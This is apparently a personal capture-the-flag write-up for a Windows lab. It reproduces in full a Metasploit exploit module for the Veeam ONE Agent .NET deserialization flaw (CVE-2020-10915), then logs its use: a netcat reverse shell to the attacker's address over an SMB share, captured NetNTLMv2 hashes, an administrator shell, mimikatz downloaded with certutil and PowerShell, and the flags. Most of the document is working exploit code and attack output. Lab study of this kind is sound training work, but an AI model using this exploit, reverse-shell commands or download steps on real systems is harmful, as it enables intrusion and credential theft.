vprint_good("--> Handshake packet: #{pkt.inspect}")
pkt
end
end
https://vulners.com/metasploit/MSF:EXPLOIT-WINDOWS-MISC-VEEAM_ONE_AGENT_DESERIALIZATION-
https://www.welivesecurity.com/la-es/2014/10/17/como-crear-primer-modulo-metasploit/
https://www.pinguytaz.net/index.php/2019/07/13/creando-un-modulo-metasploit/
and finally will be like:
┌──(kali㉿kali)-[/usr/…/modules/exploits/windows/misc]
└─$ cat veeam_one_agent_deserialization.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Veeam ONE Agent .NET Deserialization',
'Description' => %q{
This module exploits a .NET deserialization vulnerability in the Veeam
ONE Agent before the hotfix versions 9.5.5.4587 and 10.0.1.750 in the
9 and 10 release lines.
Specifically, the module targets the HandshakeResult() method used by
the Agent. By inducing a failure in the handshake, the Agent will
deserialize untrusted data.
Tested against the pre-patched release of 10.0.0.750. Note that Veeam
continues to distribute this version but with the patch pre-applied.
},
'Author' => [
'Michael Zanetta', # Discovery
'Edgar Boda-Majer', # Discovery
'wvu' # Module
],
'References' => [
['CVE', '2020-10914'],
['CVE', '2020-10915'], # This module
['ZDI', '20-545'],
['ZDI', '20-546'], # This module
['URL', 'https://www.veeam.com/kb3144']
],
'DisclosureDate' => '2020-04-15', # Vendor advisory
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
[
'Windows Command',
{
'Arch' => ARCH_CMD,
'Type' => :win_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
}
}
],
[
'Windows Dropper',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :win_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'
}
}
],
[
'PowerShell Stager',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_stager,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
}
}
],
[
'Windows Set Command',
{
'Arch' => ARCH_CMD,
'Type' => :win_cmd1,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/exec'
}
}
]
],
'DefaultTarget' => 2,
'DefaultOptions' => {
'WfsDelay' => 10
},
'Notes' => {
'Stability' => [SERVICE_RESOURCE_LOSS], # Connection queue may fill?
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
Opt::RPORT(2805),
OptString.new(
'CMD',
[
true,
'Command to be executed on the target',
'nc.exe 10.8.10.103 4444 -e cmd'
]
),
OptString.new(
'HOSTINFO_NAME',
[
true,
'Name to send in host info (must be recognized by server!)',
'AgentController'
]
)
])
end
def check
vprint_status("Checking connection to #{peer}")
connect
CheckCode::Detected("Connected to #{peer}.")
rescue Rex::ConnectionError => e
CheckCode::Unknown("#{e.class}: #{e.message}")
ensure
disconnect
end
def exploit
print_status("Connecting to #{peer}")
connect
print_status("Sending host info to #{peer}")
sock.put(host_info(datastore['HOSTINFO_NAME']))
res = sock.get_once
vprint_good("<-- Host info reply: #{res.inspect}") if res
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :win_cmd1
execute_command(datastore['CMD'])
when :win_cmd
execute_command(payload.encoded)
when :win_dropper
# TODO: Create an option to execute the full stager without hacking
# :linemax or calling execute_command(generate_cmdstager(...).join(...))
execute_cmdstager(
flavor: :psh_invokewebrequest, # NOTE: This requires PowerShell >= 3.0
linemax: 9001 # It's over 9000
)
when :psh_stager
execute_command(cmd_psh_payload(
payload.encoded,
payload.arch.first,
remove_comspec: true
))
end
rescue EOFError, Rex::ConnectionError => e
fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
ensure
disconnect
end
def execute_command(cmd, _opts = {})
vprint_status("Executing command: #{cmd}")
serialized_payload = Msf::Util::DotNetDeserialization.generate(
cmd,
gadget_chain: :TextFormattingRunProperties,
formatter: :BinaryFormatter # This is _exactly_ what we need
)
print_status("Sending malicious handshake to #{peer}")
sock.put(handshake(serialized_payload))
res = sock.get_once
vprint_good("<-- Handshake reply: #{res.inspect}") if res
rescue EOFError, Rex::ConnectionError => e
fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
end
def host_info(name)
meta = [0x0205].pack('v')
packed_name = [name.length].pack('C') + name
pkt = meta + packed_name
vprint_good("--> Host info packet: #{pkt.inspect}")
pkt
end
def handshake(serialized_payload)
# A -1 status indicates a failure, which will trigger the deserialization
status = [-1].pack('l<')
length = status.length + serialized_payload.length
type = 7
attrs = 1
kontext = 0
header = [length, type, attrs, kontext].pack('VvVV')
padding = "\x00" * 18
result = status + serialized_payload
pkt = header + padding + result
vprint_good("--> Handshake packet: #{pkt.inspect}")
pkt
end
end
La línea `when :win_cmd1` es parte de una estructura de control de flujo condicional, en este caso una estructura `case`. La línea `execute_command(datastore['CMD'])` es una llamada a una función o método que ejecuta un comando en la consola del sistema operativo. La variable `datastore` es un diccionario o hashmap que almacena valores que se pueden utilizar en el contexto del script. En este caso, se está obteniendo el valor del elemento `CMD` del diccionario y se está pasando como parámetro a la función `execute_command`.
Es posible que este código forme parte de un script de Metasploit, una herramienta de seguridad que se utiliza para realizar pruebas de penetración y explotación de vulnerabilidades en sistemas y aplicaciones. En este caso, la estructura `case` puede utilizarse para determinar qué acción realizar en función del valor de una variable. Al ejecutar la función `execute_command` con el valor del elemento `CMD` del diccionario `datastore`, se estaría ejecutando el comando especificado por el usuario en la consola del sistema operativo.
es correcto
privesc
┌──(kali㉿kali)-[~/Set]
└─$ locate nc.exe
/home/kali/Downloads/steel_mountain/nc.exe
/home/kali/ra2/nc.exe
/usr/lib/mono/4.5/cert-sync.exe
/usr/share/seclists/Web-Shells/FuzzDB/nc.exe
/usr/share/windows-resources/binaries/nc.exe
┌──(kali㉿kali)-[~/Set]
└─$ cp /home/kali/ra2/nc.exe nc.exe
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
┌──(kali㉿kali)-[~/Set]
└─$ sudo smbserver.py -smb2support -username me -password me share .
[sudo] password for kali:
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
┌──(kali㉿kali)-[~/Set]
└─$ msfconsole -q
msf6 > search veeam
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/misc/veeam_one_agent_deserialization 2020-04-15 normal Yes Veeam ONE Agent .NET Deserialization
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/misc/veeam_one_agent_deserialization
msf6 > use 0
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > show options
Module options (exploit/windows/misc/veeam_one_agent_deserialization):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD nc.exe 10.8.19.103 4444 -e yes Command to be executed on the target
cmd
HOSTINFO_NAME AgentController yes Name to send in host info (must be recognized by s
erver!)
RHOSTS yes The target host(s), see https://github.com/rapid7/
metasploit-framework/wiki/Using-Metasploit
RPORT 2805 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on.
This must be an address on the local machine or 0.
0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is rando
mly generated)
URIPATH no The URI to use for this exploit (default is random
)
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 PowerShell Stager
View the full module info with the info, or info -d command.
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > set target 3
target => 3
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > show options
Module options (exploit/windows/misc/veeam_one_agent_deserialization):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD nc.exe 10.8.19.103 4444 -e yes Command to be executed on the target
cmd
HOSTINFO_NAME AgentController yes Name to send in host info (must be recognized by s
erver!)
RHOSTS yes The target host(s), see https://github.com/rapid7/
metasploit-framework/wiki/Using-Metasploit
RPORT 2805 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on.
This must be an address on the local machine or 0.
0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is rando
mly generated)
URIPATH no The URI to use for this exploit (default is random
)
Payload options (windows/x64/exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD nc.exe 10.8.19.103 4444 -e cmd yes The command string to execute
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, n
one)
Exploit target:
Id Name
-- ----
3 Windows Set Command
View the full module info with the info, or info -d command.
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > set rhosts 127.0.0.1
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > set SRVHOST 10.8.19.103
SRVHOST => 10.8.19.103
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > set LHOST 10.8.19.103
LHOST => 10.8.19.103
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > set CMD net use a: \\\10.8.19.103\\share /user:me me&a:\nc.exe 10.8.19.103 4444 -e cmd
CMD => net use a: \10.8.19.103\share /user:me me&a:nc.exe 10.8.19.103 4444 -e cmd
escaping
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > set CMD net use a: \\\\10.8.19.103\\share /user:me me&a:\\nc.exe 10.8.19.103 4444 -e cmd
CMD => net use a: \\10.8.19.103\share /user:me me&a:\nc.exe 10.8.19.103 4444 -e cmd
┌──(kali㉿kali)-[~/Set]
└─$ sudo smbserver.py -smb2support -username me -password me share .
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.29.100,50026)
[*] AUTHENTICATE_MESSAGE (\me,SET)
[*] User SET\me authenticated successfully
[*] me:::aaaaaaaaaaaaaaaa:5bbe8b996151d7487041e65c3ac73871:0101000000000000804a8dacf21ed90132e0bb3b4254c90e0000000001001000760056004e006a004f00740071005a0003001000760056004e006a004f00740071005a000200100052005600490053004d007900580064000400100052005600490053004d0079005800640007000800804a8dacf21ed901060004000200000008003000300000000000000000000000003000008e51280f7855608ab05047cf8394e261f4c7b89e9e48340093784f0cd13f40a80a001000000000000000000000000000000000000900200063006900660073002f00310030002e0038002e00310039002e003100300033000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
uhmm
┌──(kali㉿kali)-[~/Set]
└─$ locate nc64.exe
/home/kali/hackthebox/nc64.exe
/home/kali/msdt-follina/msdt-follina/nc64.exe
/home/kali/ra2/nc64.exe
┌──(kali㉿kali)-[~/Set]
└─$ cp /home/kali/ra2/nc64.exe nc64.exe
┌──(kali㉿kali)-[~/Set]
└─$ chmod +x nc64.exe
┌──(kali㉿kali)-[~/Set]
└─$ ls
CVE-2021-1675.ps1 hash_michelle hook.zip nc64.exe plink.exe users.xml
hash_final hook.lnk Info.txt nc.exe users_final.txt winPEASany_ofs.exe
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > set CMD net use a: \\\\10.8.19.103\\share /user:me me&a:\\nc64.exe 10.8.19.103 4444 -e cmd
CMD => net use a: \\10.8.19.103\share /user:me me&a:\nc64.exe 10.8.19.103 4444 -e cmd
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > exploit
[*] 127.0.0.1:2805 - Connecting to 127.0.0.1:2805
[*] 127.0.0.1:2805 - Sending host info to 127.0.0.1:2805
[*] 127.0.0.1:2805 - Executing Windows Set Command for windows/x64/exec
[*] 127.0.0.1:2805 - Sending malicious handshake to 127.0.0.1:2805
[*] Exploit completed, but no session was created.
msf6 exploit(windows/misc/veeam_one_agent_deserialization) > options
Module options (exploit/windows/misc/veeam_one_agent_deserialization):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD net use a: \\10.8.19.103\share /user:me me&a yes Command to be executed on the target
:\nc64.exe 10.8.19.103 4444 -e cmd
HOSTINFO_NAME AgentController yes Name to send in host info (must be recognized by server!)
RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usin
g-Metasploit
RPORT 2805 yes The target port (TCP)
SRVHOST 10.8.19.103 yes The local host or network interface to listen on. This must be an address on the
local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/x64/exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD net use a: \\10.8.19.103\share /user:me me&a:\nc64.exe 10.8.19.103 4444 yes The command string to execute
-e cmd
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
Exploit target:
Id Name
-- ----
3 Windows Set Command
View the full module info with the info, or info -d command.
┌──(kali㉿kali)-[~/Set]
└─$ sudo smbserver.py -smb2support -username me -password me share .
[sudo] password for kali:
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.29.100,50140)
[*] AUTHENTICATE_MESSAGE (\me,SET)
[*] User SET\me authenticated successfully
[*] me:::aaaaaaaaaaaaaaaa:81064b34427c6121ffdfa502f9c3c679:01010000000000000040d555f51ed901b8105e597702ba3d00000000010010004a00770047005100510067005a006e00030010004a00770047005100510067005a006e0002001000540057006e0054004f0066006800410004001000540057006e0054004f00660068004100070008000040d555f51ed901060004000200000008003000300000000000000000000000003000008e51280f7855608ab05047cf8394e261f4c7b89e9e48340093784f0cd13f40a80a001000000000000000000000000000000000000900200063006900660073002f00310030002e0038002e00310039002e003100300033000000000000000000
[*] Connecting Share(1:share)
[*] Connecting Share(2:IPC$)
[*] AUTHENTICATE_MESSAGE (\,SET)
[*] Could not authenticate user!
[*] AUTHENTICATE_MESSAGE (\,SET)
[*] Could not authenticate user!
[*] AUTHENTICATE_MESSAGE (\,SET)
[*] Could not authenticate user!
[*] AUTHENTICATE_MESSAGE (\,SET)
[*] Could not authenticate user!
[*] AUTHENTICATE_MESSAGE (\,SET)
[*] Could not authenticate user!
[*] AUTHENTICATE_MESSAGE (\,SET)
[*] Could not authenticate user!
[*] AUTHENTICATE_MESSAGE (\,SET)
[*] Could not authenticate user!
[*] AUTHENTICATE_MESSAGE (\,SET)
[*] Could not authenticate user!
[*] AUTHENTICATE_MESSAGE (\,SET)
[*] Could not authenticate user!
[*] Disconnecting Share(2:IPC$)
[*] AUTHENTICATE_MESSAGE (\,SET)
[*] Could not authenticate user!
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lnvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.29.100.
Ncat: Connection from 10.10.29.100:50142.
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\windows\system32>whoami
whoami
set\one
C:\windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
C:\windows\system32>net user one
net user one
User name One
Full Name One Agent
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/7/2020 6:56:25 AM
Password expires Never
Password changeable 6/7/2020 6:56:25 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/2/2023 12:55:01 PM
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
C:\windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 6EC8-9D7C
Directory of C:\Users\Administrator\Desktop
06/16/2020 01:07 PM <DIR> .
06/16/2020 01:07 PM <DIR> ..
06/28/2020 07:42 AM 137 Flag3.txt
1 File(s) 137 bytes
2 Dir(s) 25,284,255,744 bytes free
C:\Users\Administrator\Desktop>type flag3.txt
type flag3.txt
Flag3: THM{934f7faaadab3b040edab8214789114c9d3049dd}
I am glad we blocked Veeam ONE agent in Firewall, so we can patch it next week.
:)
was really fun!
┌──(kali㉿kali)-[~/Set]
└─$ locate mimikatz.exe
/home/kali/Downloads/learning_kerberos/mimikatz.exe
/usr/share/windows-resources/mimikatz/Win32/mimikatz.exe
/usr/share/windows-resources/mimikatz/x64/mimikatz.exe
┌──(kali㉿kali)-[~/Set]
└─$ cp /home/kali/Downloads/learning_kerberos/mimikatz.exe mimikatz.exe
┌──(kali㉿kali)-[~/Set]
└─$ ls
CVE-2021-1675.ps1 hash_michelle hook.zip mimikatz.exe nc.exe users_final.txt winPEASany_ofs.exe
hash_final hook.lnk Info.txt nc64.exe plink.exe users.xml
C:\Users\One\Documents>certutil.exe -urlcache -f http://10.8.19.103:1337/mimikatz.exe mimikatz.exe
certutil.exe -urlcache -f http://10.8.19.103:1337/mimikatz.exe mimikatz.exe
Access is denied.
C:\Users\One\Documents>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\One\Documents> Invoke-WebRequest -Uri http://10.8.19.103:1337/mimikatz.exe -outfile mimikatz.exe
Invoke-WebRequest -Uri http://10.8.19.103:1337/mimikatz.exe -outfile mimikatz.exe
PS C:\Users\One\Documents> ls
ls
Directory: C:\Users\One\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/2/2023 2:09 PM 1263880 mimikatz.exe
:)
PS C:\Users\Administrator\Downloads> cmd
cmd
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Downloads>.\mimikatz.exe
.\mimikatz.exe
The system cannot execute the specified program.
C:\Users\Administrator\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 6EC8-9D7C
Directory of C:\Users\Administrator\Downloads
01/02/2023 02:13 PM <DIR> .
01/02/2023 02:13 PM <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 25,279,234,048 bytes free
Flag 1
THM{4c66e2b8d4c45a65e6a7d0c7ad4a5d7ff245dc14}
Flag 2
THM{690798b1780964f5f51cebd854da5a2ea236ebb5}
Flag 3
THM{934f7faaadab3b040edab8214789114c9d3049dd}
[[Atlas]]
Last updated
